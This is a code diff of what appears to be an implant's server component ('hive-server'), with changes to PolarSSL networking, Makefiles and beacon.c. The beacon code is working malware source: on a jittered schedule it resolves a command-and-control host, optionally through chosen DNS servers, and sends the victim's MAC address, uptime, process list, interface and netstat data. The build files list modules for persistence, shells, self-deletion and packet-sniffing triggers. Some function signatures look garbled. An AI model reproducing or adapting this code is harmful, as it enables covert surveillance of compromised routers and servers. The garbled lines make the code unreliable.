	64	+	CFLAGS += -g -O0 -DDEBUG -D_DEBUG -DPOLARSSL_DEBUG_C -DPOLARSSL_DEBUG_MSG -DPOLARSSL_SSL_DEBUG_ALL -DPOLARSSL_SELF_TEST
65	65		endif
66	66		else
67	67		CFLAGS += -Os
		skipped 81 lines

■ ■ ■ ■ ■ ■

common/polarssl-1.1.8/library/net.c

		skipped 104 lines
105	105		struct sockaddr_in server_addr;
106	106		struct hostent *server_host;
107	107
108		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
109		-	WSADATA wsaData;
110		-
111		-	if( wsa_init_done == 0 )
112		-	{
113		-	if( WSAStartup( MAKEWORD(2,0), &wsaData ) == SOCKET_ERROR )
114		-	return( POLARSSL_ERR_NET_SOCKET_FAILED );
115		-
116		-	wsa_init_done = 1;
117		-	}
118		-	#else
119	108		signal( SIGPIPE, SIG_IGN );
120		-	#endif
121	109
122	110		if( ( server_host = gethostbyname( host ) ) == NULL )
123	111		return( POLARSSL_ERR_NET_UNKNOWN_HOST );
		skipped 26 lines
150	138		int n, c[4];
151	139		struct sockaddr_in server_addr;
152	140
153		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
154		-	WSADATA wsaData;
155		-
156		-	if( wsa_init_done == 0 )
157		-	{
158		-	if( WSAStartup( MAKEWORD(2,0), &wsaData ) == SOCKET_ERROR )
159		-	return( POLARSSL_ERR_NET_SOCKET_FAILED );
160		-
161		-	wsa_init_done = 1;
162		-	}
163		-	#else
164	141		signal( SIGPIPE, SIG_IGN );
165		-	#endif
166	142
167	143		if( ( *fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ) ) < 0 )
168	144		return( POLARSSL_ERR_NET_SOCKET_FAILED );
		skipped 44 lines
213	189		*/
214	190		static int net_is_blocking( void )
215	191		{
216		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
217		-	return( WSAGetLastError() == WSAEWOULDBLOCK );
218		-	#else
219	192		switch( errno )
220	193		{
221	194		#if defined EAGAIN
		skipped 5 lines
227	200		return( 1 );
228	201		}
229	202		return( 0 );
230		-	#endif
231	203		}
232	204
233	205		/*
		skipped 33 lines
267	239		*/
268	240		int net_set_block( int fd )
269	241		{
270		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
271		-	u_long n = 0;
272		-	return( ioctlsocket( fd, FIONBIO, &n ) );
273		-	#else
274	242		return( fcntl( fd, F_SETFL, fcntl( fd, F_GETFL ) & ~O_NONBLOCK ) );
275		-	#endif
276	243		}
277	244
278	245		int net_set_nonblock( int fd )
279	246		{
280		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
281		-	u_long n = 1;
282		-	return( ioctlsocket( fd, FIONBIO, &n ) );
283		-	#else
284	247		return( fcntl( fd, F_SETFL, fcntl( fd, F_GETFL ) \| O_NONBLOCK ) );
285		-	#endif
286	248		}
287	249
288	250		/*
		skipped 19 lines
308	270		if( net_is_blocking() != 0 )
309	271		return( POLARSSL_ERR_NET_WANT_READ );
310	272
311		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
312		-	if( WSAGetLastError() == WSAECONNRESET )
313		-	return( POLARSSL_ERR_NET_CONN_RESET );
314		-	#else
315	273		if( errno == EPIPE \|\| errno == ECONNRESET )
316	274		return( POLARSSL_ERR_NET_CONN_RESET );
317	275
318	276		if( errno == EINTR )
319	277		return( POLARSSL_ERR_NET_WANT_READ );
320		-	#endif
321	278
322	279		return( POLARSSL_ERR_NET_RECV_FAILED );
323	280		}
		skipped 13 lines
337	294		if( net_is_blocking() != 0 )
338	295		return( POLARSSL_ERR_NET_WANT_WRITE );
339	296
340		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
341		-	if( WSAGetLastError() == WSAECONNRESET )
342		-	return( POLARSSL_ERR_NET_CONN_RESET );
343		-	#else
344	297		if( errno == EPIPE \|\| errno == ECONNRESET )
345	298		return( POLARSSL_ERR_NET_CONN_RESET );
346	299
347	300		if( errno == EINTR )
348	301		return( POLARSSL_ERR_NET_WANT_WRITE );
349		-	#endif
350	302
351	303		return( POLARSSL_ERR_NET_SEND_FAILED );
352	304		}
		skipped 15 lines

■ ■ ■ ■ ■ ■

common/strings/string_utils.c

		skipped 12 lines
13	13
14	14		#include "string_utils.h"
15	15
16		-
17	16		void
18	17		cl_string(unsigned char *str, int len)
19	18		{
		skipped 4 lines
24	23
25	24		}
26	25
27		-
28		-

documentation/DevelopersGuide/DevelopersGuide.odt

Binary file.
documentation/UsersGuide/UsersGuide.odt

Binary file.
documentation/UsersGuide/UsersGuide.pdf

Binary file.

■ ■ ■ ■ ■ ■

server/Makefile

		skipped 75 lines
76	76		avtech-arm:
77	77		@make -f Makefile.arch TARGET=avtech-arm
78	78
	79	+	strings:
	80	+	rm -f proj_strings.h
	81	+	@make -f Makefile.arch proj_strings.h
	82	+
79	83		CLEAN_LIST := .o PATCHED init_strings.* proj_strings* init_crypto_strings.*
80	84		CLEAN_LIST += crypto_proj_strings.h crypto_strings_main.h string_utils.h.gch
81	85		CLEAN_LIST += mod_hexify.pyc ../hive-server.tar
		skipped 39 lines

■ ■ ■ ■ ■ ■

server/Makefile.arch

		skipped 57 lines
58	58		include $(CRYPTO)/ARCH_BUILD
59	59		include $(SSL)/ARCH_BUILD
60	60		include $(STRINGS)/ARCH_BUILD
61		-	OBJS = beacon.o persistence.o launchshell.o \
62		-	shuffle.o twofish.o farm9crypt.o jshell.o \
63		-	survey_mac.o survey_uptime.o trigger_listen.o daemonize.o \
64		-	main.o tiny_crc16.o \
65		-	self_delete.o trigger_b64.o trigger_payload.o trigger_sniff.o \
66		-	threads.o trigger_callback_session.o client_session.o run_command.o \
67		-	get_data.o process_list.o netstat_an.o netstat_rn.o ifconfig.o compression.o \
68		-	init_strings.o
	61	+
	62	+	OBJS = beacon.o client_session.o compression.o daemonize.o dns_client.o decode_dns.o farm9crypt.o get_data.o \
	63	+	ifconfig.o init_strings.o jshell.o launchshell.o main.o netstat_an.o netstat_rn.o \
	64	+	persistence.o process_list.o run_command.o self_delete.o shuffle.o survey_mac.o survey_uptime.o \
	65	+	threads.o tiny_crc16.o trigger_b64.o trigger_callback_session.o trigger_listen.o trigger_payload.o trigger_sniff.o twofish.o
	66	+
	67	+	#OBJS = beacon.o persistence.o launchshell.o \
	68	+	# shuffle.o twofish.o farm9crypt.o jshell.o \
	69	+	# survey_mac.o survey_uptime.o trigger_listen.o daemonize.o \
	70	+	# main.o tiny_crc16.o \
	71	+	# self_delete.o trigger_b64.o trigger_payload.o trigger_sniff.o \
	72	+	# threads.o trigger_callback_session.o client_session.o run_command.o \
	73	+	# get_data.o process_list.o netstat_an.o netstat_rn.o ifconfig.o compression.o \
	74	+	# init_strings.o
69	75
70	76		LIBS = $(LIBBZIP2) $(LIBCRYPTO) $(LIBSSL) $(LIBCRYPTO) $(LIBDEBUG)
71	77
		skipped 189 lines

■ ■ ■ ■ ■ ■

server/beacon.c

		skipped 17 lines
18	18		#include "netstat_an.h"
19	19		#include "netstat_rn.h"
20	20		#include "compression.h"
	21	+	#include "string_utils.h"
	22	+	#include "dns_protocol.h"
21	23
	24	+	#define Free(x) if ( (x) != NULL ) free((x));
22	25		//******************************************************************
23	26		#if defined LINUX \|\| defined SOLARIS
24	27		#include <pthread.h>
		skipped 4 lines
29	32		#endif
30	33
31	34		//******************************************************************
32		-	static int send_beacon_data(BEACONINFO* beaconinfo, unsigned long uptime, int next_beacon);
33		-	static void encrypt_data(unsigned char* src, int src_size, unsigned char* dest, unsigned char* key);
34		-	static int get_printable_mac(unsigned char* dest, unsigned char* src);
35		-	static unsigned int generate_random_bytes(unsigned char * buf, unsigned int size);
36		-	static void extract_key(unsigned char* buf, unsigned char* key);
37		-	static void embedSize(unsigned int size, unsigned char* buf);
	35	+	static int send_beacon_data(BEACONINFO * beaconinfo, unsigned long uptime, int next_beacon);
	36	+	static void encrypt_data(unsigned char src, int src_size, unsigned char dest, unsigned char *key);
	37	+	static int get_printable_mac(unsigned char dest, unsigned char src);
	38	+	static unsigned int generate_random_bytes(unsigned char *buf, unsigned int size);
	39	+	static void extract_key(unsigned char buf, unsigned char key);
	40	+	static void embedSize(unsigned int size, unsigned char *buf);
38	41
39	42		//******************************************************************
40	43		//*************** Cross Platform functions *********************
		skipped 4 lines
45	48
46	49		int calc_jitter(int baseTime, float jitterPercent)
47	50		{
48		-	//multiple the percentage by the basetime to get the
49		-	//jitter range.
	51	+	//Multiply the percentage by the baseTime to get the jitter range.
50	52		int jitterRange = 0;
51	53
52	54		jitterRange = baseTime * jitterPercent;
53		-	//determine if the jitter will be positive or negative.
54		-	if(rand() > RAND_MAX/2)
55		-	{
56		-	//make it positive
57		-	return rand() % jitterRange;
58		-	}
59		-	else
60		-	{
61		-	//make it negative
62		-	return -(rand() % jitterRange);
	55	+	// Determine if the jitter will be positive or negative.
	56	+	if (rand() > RAND_MAX / 2) {
	57	+	return rand() % jitterRange; //make it positive
	58	+	} else {
	59	+	return -(rand() % jitterRange); //make it negative
63	60		}
64	61		}
65	62
66		-	unsigned int generate_random_bytes(unsigned char * buf, unsigned int size)
	63	+	unsigned int generate_random_bytes(unsigned char *buf, unsigned int size)
67	64		{
68	65		unsigned int i;
69	66
70		-	for (i=0;i<size;i++)
71		-	{
72		-	buf[i] = (unsigned char)(rand() % 255);
	67	+	for (i = 0; i < size; i++) {
	68	+	buf[i] = (unsigned char) (rand() % 255);
73	69		}
74	70
75	71		return 0;
76	72		}
77	73
78		-	void embedSize(unsigned int size, unsigned char* buf)
	74	+	void embedSize(unsigned int size, unsigned char *buf)
79	75		{
80	76		unsigned int i;
81	77		char sizeStr[30];
		skipped 1 lines
83	79
84	80		memset(sizeStr, 0, 30);
85	81		memset(data, 0, 30);
86		-	sprintf( sizeStr, "%u", size);
	82	+	sprintf(sizeStr, "%u", size);
87	83
88	84		data[0] = strlen(sizeStr) ^ XOR_KEY;
89	85
90		-	for(i = 0; i < strlen(sizeStr) + 1; i++)
91		-	{
92		-	data[i+1] = sizeStr[i] ^ XOR_KEY;
	86	+	for (i = 0; i < strlen(sizeStr) + 1; i++) {
	87	+	data[i + 1] = sizeStr[i] ^ XOR_KEY;
93	88		}
94	89
95		-	memcpy(buf,data,strlen(sizeStr)+1);
	90	+	memcpy(buf, data, strlen(sizeStr) + 1);
96	91		}
97	92
98		-	int beacon_start( char *beaconIP, int beaconPort, unsigned long initialDelay, int interval,float jitter)
	93	+	int beacon_start(BEACONINFO *beaconInfo)
99	94		{
100		-	BEACONINFO *beaconInfo = NULL;
101	95		int numTries = 0;
102	96
103		-	//TODO: check malloc() return value
104		-	beaconInfo = (BEACONINFO *)malloc( sizeof( BEACONINFO ));
105		-	memset( beaconInfo, 0, sizeof( BEACONINFO ) );
106		-
107		-	//initalize IP string
108		-	//TODO: check malloc() return value
109		-	beaconInfo->ip = (char*) malloc( strlen( beaconIP ) + 1 );
110		-
111		-	//setup beacon stuct
112		-	memcpy( beaconInfo->ip,beaconIP, strlen( beaconIP ) + 1 );
113		-	beaconInfo->port = beaconPort;
114		-	beaconInfo->initDelay = initialDelay;
115		-	beaconInfo->interval = interval;
116		-	beaconInfo->percentVariance = jitter;
117		-	while(numTries != 5)
118		-	{
119		-	if( GetMacAddr(beaconInfo->macAddr) != SUCCESS)
120		-	{
	97	+	while (numTries != 5) {
	98	+	if (GetMacAddr(beaconInfo->macAddr) != SUCCESS) {
121	99		numTries++;
122		-	if( numTries == 5)
123		-	{
	100	+	if (numTries == 5) {
124	101		DLX(1, printf("ERROR: failed to pull MAC address\n"));
125		-	return FAILURE;
	102	+	return FAILURE;
126	103		}
127		-	}
128		-	else
129		-	{
	104	+	} else {
130	105		break;
131	106		}
132	107		// TODO: should this be Sleep( 60 * 100 ); ???
133	108		sleep(60);
134	109		}
135		-
136		-	// NOTE: on Solaris 7, anything the thread writes to stdout,
137		-	// or stderr will not be displayed on the main console output.
138		-	// This default behavior is analogous to daemonizing the thread
139		-
140		-	#if defined __EFENCE__ \|\| defined __VALGRIND__
141		-	if ( beacon( (void *)beaconInfo ) != SUCCESS )
142		-	{
143		-	DLX(1, printf( " ERROR: failed to create beacon thread\n" ));
144		-	return FAILURE;
145		-	}
146		-	else
147		-	{
148		-	goto not_reached;
149		-	}
150		-	#endif
151		-	if ( make_thread( beacon, (void *)beaconInfo ) != SUCCESS )
152		-	{
153		-	DLX(1, printf( " ERROR: failed to create beacon thread\n" ));
	110	+	if (make_thread(beacon, (void *) beaconInfo) != SUCCESS) {
	111	+	DLX(1, printf(" ERROR: failed to create beacon thread\n"));
154	112		return FAILURE;
155	113		}
156	114
157	115		return SUCCESS;
158		-
159		-	// NOT REACHED
160		-	//not_reached:
161		-	// free( beaconInfo->ip );
162		-	// free( beaconInfo );
163		-	return SUCCESS;
164	116		}
165	117
166		-	//******************************************************************
167		-	// TODO: UNIX pthreads calls function that returns a void pointer?
168		-	// is Windows flexible, if not, we can still be portable by defining a new
169		-	// return type and having that defined, specifically, at compile time
170		-
171		-	void beacon(void param)
	118	+	void beacon(void param)
172	119		{
173	120		unsigned long secondsUp = 0;
174		-	int ret = 0;
175	121		int beaconInterval = 0;
176	122		int jitter = 0;
177		-	BEACONINFO beaconInfo = (BEACONINFO )param;
	123	+	int i;
	124	+	struct in_addr beaconIPaddr;
	125	+	BEACONINFO *beaconInfo;
178	126
179		-	#ifdef __VALGRIND__
180		-	int counter = 0;
181		-	#endif
	127	+	beaconInfo = (BEACONINFO *) param;
	128	+	DLX(4, printf("Starting beacon thread with initial beacon delay of %ld seconds\n", beaconInfo->initDelay / 1000));
	129	+	Sleep(beaconInfo->initDelay); // Wait for initial delay
182	130
183		-	DLX(4, printf ( "Starting beacon thread with initial beacon delay of %d seconds\n", beaconInfo->initDelay/1000));
	131	+	for (;;) { // Beacon Loop
	132	+	secondsUp = GetSystemUpTime(); // Get system uptime
	133	+	DLX(4, printf("\tSystem uptime is %ld\n", secondsUp));
184	134
185		-	//Wait out initial delay
186		-	Sleep(beaconInfo->initDelay);
	135	+	// Resolve beacon IP address
	136	+	if (inet_pton(AF_INET, beaconInfo->host, &beaconIPaddr) <= 0) { // Determine if beacon host is an name or dotted-quad address
	137	+	for (i = 0; i < 2; i++) {
	138	+	if (strlen(beaconInfo->dns[i]))
	139	+	DLX(4, printf("\tPerforming DNS lookup for %s using DNS server at %s.\n", beaconInfo->host, beaconInfo->dns[i]));
	140	+	if ( (beaconInfo->ip = dns_resolv(beaconInfo->host, beaconInfo->dns[i])) )
	141	+	break;
	142	+	}
	143	+	if (beaconInfo->ip == NULL) {
	144	+	DLX(4, printf("\tBeacon host could not be resolved.\n"));
	145	+	goto sleep; // Try again next beacon interval
	146	+	}
	147	+	} else
	148	+	beaconInfo->ip = strdup(beaconInfo->host); // IF beaconInfo-> host was an IP address, clone it (so it can be freed later)
187	149
188		-	secondsUp = GetSystemUpTime();
189		-	DLX(1, printf("System uptime is %ld seconds\n", secondsUp));
190		-
191		-	//Send initial beacon back
192		-
193		-	// TODO: SendBeaconData does not handle errors returned
194		-	if (beaconInfo->percentVariance > 0)
195		-	{
196		-	//get jitter
197		-	jitter = calc_jitter(beaconInfo->interval, beaconInfo->percentVariance);
198		-	//calculate new interval
199		-	beaconInterval = beaconInfo->interval + jitter;
200		-	}
201		-	else
202		-	{
203		-	beaconInterval = beaconInfo->interval;
204		-	}
205		-	DLX(2, printf( "Sending [first] beacon data\n" ));
206		-	ret = send_beacon_data(beaconInfo,secondsUp,beaconInterval);
207		-
208		-	#if defined __EFENCE__ \|\| defined __VALGRIND__
209		-	// if ( COUNTER_LIMIT == 0 ) goto not_reached;
210		-	#endif
211		-
212		-	//Loop that gets uptime
213		-	for(;;)
214		-	{
215		-	//Sleep for the length of the interval
216		-	DLX(4, printf ("\tStarting beacon interval of %d seconds.\n", beaconInfo->interval/1000));
217		-	Sleep(beaconInterval);
218		-
219		-	if (beaconInfo->percentVariance > 0)
220		-	{
221		-	//get jitter
222		-	jitter = calc_jitter(beaconInfo->interval, beaconInfo->percentVariance);
223		-	//calculate new interval
	150	+	if (beaconInfo->percentVariance > 0) {
	151	+	DLX(4, printf("Variance = %f\n", beaconInfo->percentVariance));
	152	+	jitter = calc_jitter(beaconInfo->interval, beaconInfo->percentVariance); // Get jitter and calculate new interval
	153	+	DLX(4, printf("Jitter = %d\n", jitter));
224	154		beaconInterval = beaconInfo->interval + jitter;
225		-	}
226		-	else
227		-	{
	155	+	DLX(4, printf("Beacon Interval = %d\n", beaconInterval));
	156	+	} else {
228	157		beaconInterval = beaconInfo->interval;
229	158		}
230	159
231		-	//get system uptime
232		-	secondsUp = GetSystemUpTime();
233		-	DLX(4, printf( "\tSystem uptime is %ld\n", secondsUp));
234		-
235		-	//Beacon back
236	160		// TODO: SendBeaconData does not handle errors returned
237		-	DLX(4, printf( "\tSending beacon data\n"));
238		-	ret = send_beacon_data(beaconInfo,secondsUp,beaconInterval);
239		-	if(ret == SUCCESS) {
240		-	update_file((char*)sdcfp);
	161	+	DLX(4, printf("\tSending beacon\n"));
	162	+	if (send_beacon_data(beaconInfo, secondsUp, beaconInterval) == SUCCESS) {
	163	+	update_file((char *) sdcfp);
241	164		} else {
242		-	DLX(4, printf( "\tSend of beacon data failed\n"));
	165	+	DLX(4, printf("\tSend of beacon failed\n"));
243	166		}
244		-	#ifdef __VALGRIND__
245		-	if ( ++counter > 10 ) goto not_reached;
246		-	#endif
	167	+	Free(beaconInfo->ip);
	168	+
	169	+	sleep:
	170	+	DLX(4, printf("\tSending next beacon in %d seconds.\n", beaconInterval / 1000));
	171	+	Sleep(beaconInterval); //Sleep for the length of the interval
247	172
248	173		}
249	174
250		-	// NOT REACHED
251		-	#ifdef __VALGRIND__
252		-	not_reached:
253		-	terminate_thread();
254		-	#endif
255		-
256		-	return (void *)NULL;
	175	+	return (void *) NULL;
257	176		}
258	177
259	178		#include <stdlib.h>
260	179		//******************************************************************
261		-	static int send_beacon_data(BEACONINFO* beaconInfo, unsigned long uptime, int next_beacon)
	180	+	static int send_beacon_data(BEACONINFO * beaconInfo, unsigned long uptime, int next_beacon)
262	181		{
263		-	int sock = 0;
264		-	int retval = 0;
265		-	int size = 0;
266		-	int defaultBufSize = 3000;
267		-	unsigned int packetSize = 0;
268		-	unsigned int compressedPacketSize = 0;
269		-	int encrypt_size = 0;
270		-	int bytes_sent = 0;
271		-	int sz_to_send = 0;
272		-	int recv_sz = 0;
273		-	char temp[1024];
274		-	char recv_buf[30];
275		-	//unsigned char* cmd_str = NULL;
276		-	unsigned char* enc_buf = NULL;
277		-	unsigned char* packet = NULL;
278		-	unsigned char* compressed_packet = NULL;
279		-	unsigned char* ptr = NULL;
280		-	unsigned char randData[64];
281		-	unsigned char key[16];
	182	+	int sock = 0;
	183	+	int retval = 0;
	184	+	int size = 0;
	185	+	int defaultBufSize = 3000;
	186	+	unsigned int packetSize = 0;
	187	+	unsigned int compressedPacketSize = 0;
	188	+	int encrypt_size = 0;
	189	+	int bytes_sent = 0;
	190	+	int sz_to_send = 0;
	191	+	int recv_sz = 0;
	192	+	char temp[1024];
	193	+	char recv_buf[30];
	194	+	//unsigned char* cmd_str = NULL;
	195	+	unsigned char *enc_buf = NULL;
	196	+	unsigned char *packet = NULL;
	197	+	unsigned char *compressed_packet = NULL;
	198	+	unsigned char *ptr = NULL;
	199	+	unsigned char randData[64];
	200	+	unsigned char key[16];
282	201
283	202		//beacon packet structs
284		-	BEACON_HDR bhdr;
285		-	ADD_HDR mac_hdr;
286		-	ADD_HDR uptime_hdr;
287		-	ADD_HDR proc_list_hdr;
288		-	ADD_HDR ipconfig_hdr;
289		-	ADD_HDR netstat_rn_hdr;
290		-	ADD_HDR netstat_an_hdr;
291		-	ADD_HDR next_beacon_hdr;
292		-	ADD_HDR end_hdr;
	203	+	BEACON_HDR bhdr;
	204	+	ADD_HDR mac_hdr;
	205	+	ADD_HDR uptime_hdr;
	206	+	ADD_HDR proc_list_hdr;
	207	+	ADD_HDR ipconfig_hdr;
	208	+	ADD_HDR netstat_rn_hdr;
	209	+	ADD_HDR netstat_an_hdr;
	210	+	ADD_HDR next_beacon_hdr;
	211	+	ADD_HDR end_hdr;
293	212
294	213		//beacon packet sizes. (used for memcpy)
295	214		unsigned short mac_len = 0;
		skipped 5 lines
301	220		unsigned short next_beacon_len = 0;
302	221
303	222		//beacon data strings
304		-	unsigned char* mac_data = NULL;
305		-	unsigned char* uptime_data = NULL;
306		-	unsigned char* proc_list_data = NULL;
307		-	unsigned char* ipconfig_data = NULL;
308		-	unsigned char* netstat_rn_data = NULL;
309		-	unsigned char* netstat_an_data = NULL;
310		-	unsigned char* next_beacon_data = NULL;
	223	+	unsigned char *mac_data = NULL;
	224	+	unsigned char *uptime_data = NULL;
	225	+	unsigned char *proc_list_data = NULL;
	226	+	unsigned char *ipconfig_data = NULL;
	227	+	unsigned char *netstat_rn_data = NULL;
	228	+	unsigned char *netstat_an_data = NULL;
	229	+	unsigned char *next_beacon_data = NULL;
311	230
312		-	crypt_context *beacon_io = NULL; // Command and control I/O connection context
	231	+	crypt_context *beacon_io = NULL; // Command and control I/O connection context
313	232
314	233		memset(temp, 0, 1024);
315	234
316	235		//Populate Beacon Header
317		-	bhdr.os = 0;
	236	+	bhdr.os = BH_UNDEFINED;
	237	+
318	238		#if defined AVTECH_ARM
319		-	bhdr.os = htons(BH_AVTECH_ARM);
	239	+	bhdr.os = BH_AVTECH_ARM;
320	240
321	241		#elif defined MIKROTIK
322		-	#if defined _PPC
323		-	bhdr.os = htons(BH_MIKROTIK_PPC);
324		-	#elif defined _MIPS
325		-	bhdr.os = htons(BH_MIKROTIK_MIPS);
326		-	#elif defined _MIPSEL
327		-	bhdr.os = htons(BH_MIKROTIK_MIPSEL);
328		-	#elif defined _X86
329		-	bhdr.os = htons(BH_MIKROTIK_X86);
330		-	#endif
	242	+	#if defined _PPC
	243	+	bhdr.os = BH_MIKROTIK_PPC;
	244	+	#elif defined _MIPS
	245	+	bhdr.os = BH_MIKROTIK_MIPS;
	246	+	#elif defined _MIPSEL
	247	+	bhdr.os = BH_MIKROTIK_MIPSEL;
	248	+	#elif defined _X86
	249	+	bhdr.os = BH_MIKROTIK_X86;
	250	+	#endif
331	251
332	252		#elif (defined LINUX) && (!defined UBIQUITI)
333		-	#if defined _X86
334		-	bhdr.os = htons(BH_LINUX_X86);
335		-	#elif defined _X86_64
336		-	bhdr.os = htons(BH_LINUX_X86_64);
337		-	#endif
	253	+	#if defined _X86
	254	+	bhdr.os = BH_LINUX_X86;
	255	+	#elif defined _X86_64
	256	+	bhdr.os = BH_LINUX_X86_64;
	257	+	#endif
338	258
339	259		#elif defined UBIQUITI
340		-	bhdr.os = htons(BH_UBIQUITI_MIPS);
	260	+	bhdr.os = BH_UBIQUITI_MIPS;
341	261
342	262		#else
343		-	#error "ARCHITECTURE NOT DEFINED"
	263	+	#error "ARCHITECTURE NOT DEFINED"
344	264		#endif
345	265
346		-	//TODO: Change this number whenever the version changes.
347		-	bhdr.version = htons(29);
	266	+	bhdr.version = BEACON_HEADER_VERSION;
348	267		DLX(4, printf("\tBEACON HEADER: version: %i, os: %i\n", bhdr.version, bhdr.os));
	268	+	DLX(4, printf("\tBEACON DATA CHECK: IP: %s, Port: %d\n", beaconInfo->ip, beaconInfo->port));
	269	+	bhdr.version = htons(BEACON_HEADER_VERSION); //TODO: Change this number whenever the version changes.
	270	+	bhdr.os = htons(bhdr.os); // Convert for network byte order
349	271
350	272		//Populate Additional Headers
351		-	//mac address
	273	+	// MAC address
352	274		mac_hdr.type = htons(MAC);
353		-	mac_data = (unsigned char*) malloc(MAC_ADDR_LEN_FORMATTED);
354		-	if(mac_data != NULL)
355		-	{
	275	+	mac_data = (unsigned char *) malloc(MAC_ADDR_LEN_FORMATTED);
	276	+	if (mac_data != NULL) {
356	277		memset(mac_data, 0, MAC_ADDR_LEN_FORMATTED);
357	278		get_printable_mac(mac_data, beaconInfo->macAddr);
358	279		}
359		-	mac_len = strlen((char *)mac_data);
	280	+	mac_len = strlen((char *) mac_data);
360	281		mac_hdr.length = htons(mac_len);
361		-	//uptime
	282	+
	283	+	// Uptime
362	284		uptime_hdr.type = htons(UPTIME);
363		-	memset( temp, 0, 1024);
364		-	sprintf( temp, "%lu", uptime);
365		-	uptime_len = strlen(temp)+1;
	285	+	memset(temp, 0, 1024);
	286	+	sprintf(temp, "%lu", uptime);
	287	+	uptime_len = strlen(temp) + 1;
366	288		uptime_hdr.length = htons(uptime_len);
367	289
368		-	uptime_data = (unsigned char*) malloc(uptime_len);
369		-	if(uptime_data != NULL)
370		-	{
371		-	memset(uptime_data,0,uptime_len);
372		-	memcpy(uptime_data,temp,uptime_len);
	290	+	uptime_data = (unsigned char *) malloc(uptime_len);
	291	+	if (uptime_data != NULL) {
	292	+	memset(uptime_data, 0, uptime_len);
	293	+	memcpy(uptime_data, temp, uptime_len);
373	294		}
374		-
375		-	//next beacon time in seconds
	295	+	// Next-beacon time in seconds
376	296		next_beacon_hdr.type = htons(NEXT_BEACON_TIME);
377	297		memset(temp, 0, 1024);
378		-	sprintf(temp, "%d", (next_beacon/1000));
	298	+	sprintf(temp, "%d", (next_beacon / 1000));
379	299
380	300		next_beacon_len = strlen(temp);
381	301		next_beacon_hdr.length = htons(next_beacon_len);
382	302
383		-	next_beacon_data = (unsigned char*) malloc(next_beacon_len);
384		-	if(next_beacon_data != NULL)
385		-	{
	303	+	next_beacon_data = (unsigned char *) malloc(next_beacon_len);
	304	+	if (next_beacon_data != NULL) {
386	305		memset(next_beacon_data, 0, next_beacon_len);
387	306		memcpy(next_beacon_data, temp, next_beacon_len);
388	307		}
389		-
390		-	//process list
	308	+	// Process list
391	309		proc_list_hdr.type = htons(PROCESS_LIST);
392	310		//TODO: check malloc() return value
393	311		proc_list_data = get_process_list(&size);
394		-	if( proc_list_data == NULL)
395		-	{
	312	+	if (proc_list_data == NULL) {
396	313		proc_list_len = 0;
397		-	}
398		-	else
399		-	{
	314	+	} else {
400	315		proc_list_len = size;
401	316		}
402	317		proc_list_hdr.length = htons(proc_list_len);
		skipped 3 lines
406	321		//ipconfig
407	322		ipconfig_hdr.type = htons(IPCONFIG);
408	323		ipconfig_data = get_ifconfig(&size);
409		-	if(ipconfig_data == NULL)
410		-	{
	324	+	if (ipconfig_data == NULL) {
411	325		ipconfig_len = 0;
412		-	}
413		-	else
414		-	{
	326	+	} else {
415	327		ipconfig_len = size;
416	328		}
417	329
		skipped 5 lines
423	335
424	336		netstat_rn_hdr.type = htons(NETSTAT_RN);
425	337		netstat_rn_data = get_netstat_rn(&size);
426		-	if(netstat_rn_data == NULL)
427		-	{
	338	+	if (netstat_rn_data == NULL) {
428	339		netstat_rn_len = 0;
429		-	}
430		-	else
431		-	{
	340	+	} else {
432	341		netstat_rn_len = size;
433	342		}
434	343		netstat_rn_hdr.length = htons(netstat_rn_len);
		skipped 2 lines
437	346		//netstat -an
438	347		netstat_an_hdr.type = htons(NETSTAT_AN);
439	348		netstat_an_data = get_netstat_an(&size);
440		-	if(netstat_an_data == NULL)
441		-	{
	349	+	if (netstat_an_data == NULL) {
442	350		netstat_an_len = 0;
443		-	}
444		-	else
445		-	{
	351	+	} else {
446	352		netstat_an_len = size;
447	353		}
448	354		netstat_an_hdr.length = htons(netstat_an_len);
		skipped 9 lines
458	364		packetSize = (sizeof(ADD_HDR) * 8) + mac_len + uptime_len +
459	365		proc_list_len + ipconfig_len + netstat_rn_len + netstat_an_len + next_beacon_len;
460	366
461		-	packet = (unsigned char*) malloc(packetSize);
462		-	if( packet == NULL)
463		-	{
	367	+	packet = (unsigned char *) malloc(packetSize);
	368	+	if (packet == NULL) {
464	369		DLX(1, printf("Not enough memory to allocate packet!"));
465	370		goto EXIT;
466	371		}
		skipped 1 lines
468	373		ptr = packet;
469	374
470	375		//copy in mac hdr
471		-	memcpy(ptr,(unsigned char*)&mac_hdr, sizeof(mac_hdr));
	376	+	memcpy(ptr, (unsigned char *) &mac_hdr, sizeof(mac_hdr));
472	377		ptr += sizeof(ADD_HDR);
473	378		//copy in mac addr
474		-	memcpy(ptr,mac_data, mac_len);
	379	+	memcpy(ptr, mac_data, mac_len);
475	380		ptr += mac_len;
476	381		//copy in uptime hdr
477		-	memcpy(ptr,(unsigned char*)&uptime_hdr, sizeof(uptime_hdr));
	382	+	memcpy(ptr, (unsigned char *) &uptime_hdr, sizeof(uptime_hdr));
478	383		ptr += sizeof(ADD_HDR);
479	384		//copy in uptime data
480		-	memcpy(ptr,uptime_data, uptime_len);
	385	+	memcpy(ptr, uptime_data, uptime_len);
481	386		ptr += uptime_len;
482	387		//copy in next beacon hdr
483		-	memcpy(ptr,(unsigned char*)&next_beacon_hdr,sizeof(next_beacon_hdr));
	388	+	memcpy(ptr, (unsigned char *) &next_beacon_hdr, sizeof(next_beacon_hdr));
484	389		ptr += sizeof(ADD_HDR);
485	390		//copy in next beacon data
486		-	memcpy(ptr,next_beacon_data,next_beacon_len);
	391	+	memcpy(ptr, next_beacon_data, next_beacon_len);
487	392		ptr += next_beacon_len;
488	393		//copy in process list hdr
489		-	if(proc_list_data != NULL)
490		-	{
491		-	memcpy(ptr,(unsigned char*)&proc_list_hdr, sizeof(proc_list_hdr));
	394	+	if (proc_list_data != NULL) {
	395	+	memcpy(ptr, (unsigned char *) &proc_list_hdr, sizeof(proc_list_hdr));
492	396		ptr += sizeof(ADD_HDR);
493	397		//copy in process list
494		-	memcpy(ptr,proc_list_data, proc_list_len);
	398	+	memcpy(ptr, proc_list_data, proc_list_len);
495	399		ptr += proc_list_len;
496	400		}
497	401		//copy in ipconfig hdr
498		-	if(ipconfig_data != NULL)
499		-	{
